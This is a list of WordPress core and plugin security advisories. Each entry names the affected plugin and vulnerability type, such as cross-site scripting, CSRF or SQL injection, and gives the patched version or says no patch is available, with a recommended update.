Vulnerability: Incorrect Authorization Checks
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Contact Form DB

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.8.28
Recommended Action: Update to version 2.8.28, or a newer patched version

Plugin: WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 8.2.7
Recommended Action: Update to version 8.2.7, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: Nested Pages

Vulnerability: Cross-Site Request Forgery to Arbitrary Post Deletion and Modification
Patched Version: 3.1.16
Recommended Action: Update to version 3.1.16, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.06
Recommended Action: Update to version 3.06, or a newer patched version

Plugin: Import XML and RSS Feeds

Vulnerability: Server-Side Request Forgery
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Floating Social Media Links

Vulnerability: Remote File Inclusion via fsml-admin.js.php wpp parameter
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Thank You Page Customizer for WooCommerce – Increase Your Sales

Vulnerability: Cross-Site Request Forgery via send_email
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Stream

Vulnerability: Sensitive Data Exposure
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Core: WordPress

Vulnerability: No subtitle
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Minimal Coming Soon – Coming Soon Page

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.35
Recommended Action: Update to version 2.35, or a newer patched version

Plugin: MyCSS

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Addons for WPBakery

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.19.18
Recommended Action: Update to version 3.19.18, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.7.9
Recommended Action: Update to version 4.7.9, or a newer patched version

Plugin: WP Page Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login by Auth0

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Server-Side Request Forgery
Patched Version: .51.1
Recommended Action: Update to version .51.1, or a newer patched version

Plugin: Google Site Verification plugin using Meta Tag

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP eCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Product page shipping calculator for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.21
Recommended Action: Update to version 1.3.21, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Cross-Site Request Forgery to Malware Scan Termination
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Plugin for Google Reviews

Vulnerability: Missing Authorization
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: WP Quick FrontEnd Editor – WordPress Plugin

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Codestyling Localization

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated (Admin+) Remote Code Execution via Multi-Select
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Social Slider Feed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: Download Manager

Vulnerability: Arbitrary File Upload
Patched Version: 3.1.19
Recommended Action: Update to version 3.1.19, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.72
Recommended Action: Update to version 3.0.72, or a newer patched version

Plugin: Contact Form by BestWebSoft – Advanced Contact Us Form Builder for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Jquery Validation For Contact Form 7

Vulnerability: Cross-Site Request Forgery to Arbitrary Options Update
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Plugin: Seamless Donations is Sunset

Vulnerability: Cross-Site Request Forgery to Settings Change
Patched Version: 5.1.8
Recommended Action: Update to version 5.1.8, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: WP EXtra

Vulnerability: Missing Authorization to Export Settings
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: BuddyPress

Vulnerability: Denial of Service
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: Gwolle Guestbook

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Order Tracking – WordPress Status Tracking Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated SQL Injection
Patched Version: 3.2.34
Recommended Action: Update to version 3.2.34, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Cross-Site Request Forgery via multiple functions
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: FormBuilder

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 0.91
Recommended Action: Update to version 0.91, or a newer patched version

Plugin: Pretty Link Lite

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Slider & Popup Builder by Depicter – Add Image Slider, Carousel Slider, Exit Intent Popup, Popup Modal, Coupon Popup, Post Slider Carousel

Vulnerability: Missing Authorization on ‘make’ function
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Feed Them Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Reflected HTML Content Injection
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Product Vendors

Vulnerability: Authenticated (Vendor admin+) SQL Injection
Patched Version: 2.1.77
Recommended Action: Update to version 2.1.77, or a newer patched version

Plugin: Simple Share Follow Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Doneren met Mollie

Vulnerability: Information Disclosure
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Authenticated SQL Injection
Patched Version: 5.8.4
Recommended Action: Update to version 5.8.4, or a newer patched version

Plugin: Buy Me a Coffee – Button and Widget Plugin

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: WPUpper Share Buttons

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.43
Recommended Action: Update to version 3.43, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated SQL Injection
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Authenticated (Admin+) PHAR Deserialization
Patched Version: 3.39
Recommended Action: Update to version 3.39, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Task Data
Patched Version: 2.7.11.11
Recommended Action: Update to version 2.7.11.11, or a newer patched version

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Core: WordPress

Vulnerability: Cryptographic Weakness
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Authorization Bypass and Cross-Site Request Forgery
Patched Version: 4.2.22
Recommended Action: Update to version 4.2.22, or a newer patched version

Plugin: StatCounter – Free Real Time Visitor Stats

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Core: WordPress

Vulnerability: Directory Traversal
Patched Version: 4.1.38
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.38, 4.2.35, 4.3.31, 4.4.30, 4.5.29, 4.6.26, 4.7.26, 4.8.22, 4.9.23, 5.0.19, 5.1.16, 5.2.18, 5.3.15, 5.4.13, 5.5.12, 5.6.11, 5.7.9, 5.8.7, 5.9.6, 6.0.4, 6.1.2, 6.2.1

Plugin: Facebook Chat Plugin – Live Chat Plugin for WordPress

Vulnerability: Cross-Site Request Forgery to Site Settings Changes
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Pro <= 5.0.6
Patched Version: 5.0.7
Recommended Action: Update to version 5.0.7, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Subscriber+ SQL Injection
Patched Version: 2.18.10
Recommended Action: Update to version 2.18.10, or a newer patched version

Plugin: authLdap

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: WooODT Lite – Delivery & pickup date time location for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Gallery PhotoBlocks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.41
Recommended Action: Update to version 1.1.41, or a newer patched version

Plugin: Accept Stripe Payments

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.40
Recommended Action: Update to version 2.0.40, or a newer patched version

Plugin: Casso – Tự động xác nhận thanh toán chuyển khoản ngân hàng

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Onclick show popup

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: wp-limit-posts-automatically

Vulnerability: Cross-Site Request Forgery leading to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: CSV Injection
Patched Version: 2.2.20
Recommended Action: Update to version 2.2.20, or a newer patched version

Plugin: Front End Users

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.25
Recommended Action: Update to version 3.2.25, or a newer patched version

Plugin: Elfsight Instagram Widget – Instagram Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Watcheezy Live chat plugin for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WP Image Zoom

Vulnerability: Local File Inclusion
Patched Version: 1.47.1
Recommended Action: Update to version 1.47.1, or a newer patched version

Plugin: Zendesk Chat

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Survey Maker

Vulnerability: Authenticated SQL Injection
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated Arbitrary Options Update
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Filr – Secure document library

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 1.2.3.6
Recommended Action: Update to version 1.2.3.6, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: HTML filter and csv-file search

Vulnerability: Authenticated (Contributor+) Local File Inclusion via Shortcode
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Arabic Font

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Clickjacking
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Testimonial

Vulnerability: Multiple Vulnerabilities
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Breadcrumb

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5.33
Recommended Action: Update to version 1.5.33, or a newer patched version

Plugin: WP GDPR

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wp Limits

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: hpb Dashboard

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.6
Recommended Action: Update to version 5.6, or a newer patched version

Plugin: Cost of Goods: Product Cost & Profit Calculator for WooCommerce

Vulnerability: Cross-Site Request Forgery in save_costs
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Rife Elementor Extensions & Templates

Vulnerability: Missing Authorization via import_templates
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Easy Google Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.11.8
Recommended Action: Update to version 1.11.8, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘pages’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Easy Form by AYS – Form Builder Plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Arbitrary File Upload
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: WP Image Resizer

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quick Adsense

Vulnerability: Missing Authorization
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Ultimate Addons for Elementor

Vulnerability: Authentication Bypass
Patched Version: 1.20.1
Recommended Action: Update to version 1.20.1, or a newer patched version

Plugin: Limit Login Attempts

Vulnerability: Brute Force Bypass
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.22
Recommended Action: Update to version 2.9.22, or a newer patched version

Plugin: BizLibrary

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wpForo Forum

Vulnerability: Insecure Direct Object Reference to Forum Status Change
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Neshan Maps

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Menu Cart

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: WP Business Intelligence Lite

Vulnerability: Arbitrary File Upload
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: WP-Ban

Vulnerability: Improper Input Validation
Patched Version: 1.64
Recommended Action: Update to version 1.64, or a newer patched version

Plugin: Simple Real Estate Pack

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JH 404 Logger

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wp-ImageZoom

Vulnerability: Directory Traversal
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Cookie Notice & Compliance for GDPR / CCPA

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Hotel Booking

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Cart Lift – Abandoned Cart Recovery for WooCommerce and EDD

Vulnerability: Reflected Cross-Site Scripting via cart_search
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Embed Any Document – Embed PDF, Word, PowerPoint and Excel Files

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via SVG files
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: WP-Filebase

Vulnerability: Missing Authorization Checks
Patched Version: 0.2.9.25
Recommended Action: Update to version 0.2.9.25, or a newer patched version

Plugin: SEO

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: seo-watcher

Vulnerability: Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Be POPIA Compliant

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Conference Scheduler

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: GamiPress – Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: Advanced Booking Calendar

Vulnerability: Authenticated SQL Injection
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Custom Sidebars – Dynamic Sidebar Widget Area Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Pixabay Images

Vulnerability: Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Sync WooCommerce Product feed to Google Shopping

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CommentLuv

Vulnerability: Server Side Request Forgery via do_click
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – QR Codes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: BruteBank – WP Security & Firewall

Vulnerability: WP Security & Firewall <= 1.8
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: wp-slimstat-ex

Vulnerability: Arbitrary Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UpdraftCentral Dashboard

Vulnerability: Server-Side Request Forgery
Patched Version: 0.8.24
Recommended Action: Update to version 0.8.24, or a newer patched version

Plugin: MOLIE – Instructure Canvas Linking tool

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LeadSquared Suite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Mail Logging

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email
Patched Version: 1.11.2
Recommended Action: Update to version 1.11.2, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Unauthenticated Privilege Escalation via User Meta
Patched Version: 2.1.12
Recommended Action: Update to version 2.1.12, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 8.0.18
Recommended Action: Update to version 8.0.18, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.59
Recommended Action: Update to version 1.5.59, or a newer patched version

Plugin: eShop

Vulnerability: Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Browser Theme Color

Vulnerability: Cross-Site Request Forgery via btc_settings_page
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Videojs HTML5 Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.09.05
Recommended Action: Update to version 4.09.05, or a newer patched version

Plugin: Stripe Payment Plugin for WooCommerce

Vulnerability: Missing Authorization to Arbitrary Order Status Modification
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.4.14
Recommended Action: Update to version 2.4.14, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘statusBulkEdit’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WP Limit Login Attempts

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Scripting via the rules[0][content] parameter in a wpfc_save_exclude_pages action
Patched Version: 0.8.8.6
Recommended Action: Update to version 0.8.8.6, or a newer patched version

Plugin: Genesis Columns Advanced

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WP Code Highlight.js

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 0.6.3
Recommended Action: Update to version 0.6.3, or a newer patched version

Plugin: AFFILIATE Solution

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woodmart Core

Vulnerability: PHP Object Injection
Patched Version: 1.0.37
Recommended Action: Update to version 1.0.37, or a newer patched version

Plugin: Minify HTML

Vulnerability: Cross-Site Request Forgery in minify_html_menu_options
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: VS Contact Form

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 11.6
Recommended Action: Update to version 11.6, or a newer patched version

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: Missing Authorization
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: WordPress Country Selector

Vulnerability: Reflected Cross-Site Scripting via AJAX call of check_country_selector
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Ditty – Responsive News Tickers, Sliders, and Lists

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.33
Recommended Action: Update to version 3.0.33, or a newer patched version

Plugin: I Recommend This

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: WordPress Users

Vulnerability: SQL Injection
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Progressive License

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hide My WP – Amazing Security Plugin for WordPress!

Vulnerability: Cross-Site Scripting
Patched Version: 4.54
Recommended Action: Update to version 4.54, or a newer patched version

Plugin: Autoptimize

Vulnerability: Race Condition leading to Remote Code Execution
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Cross-Site Scripting
Patched Version: 6.19
Recommended Action: Update to version 6.19, or a newer patched version

Plugin: Themify Icons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

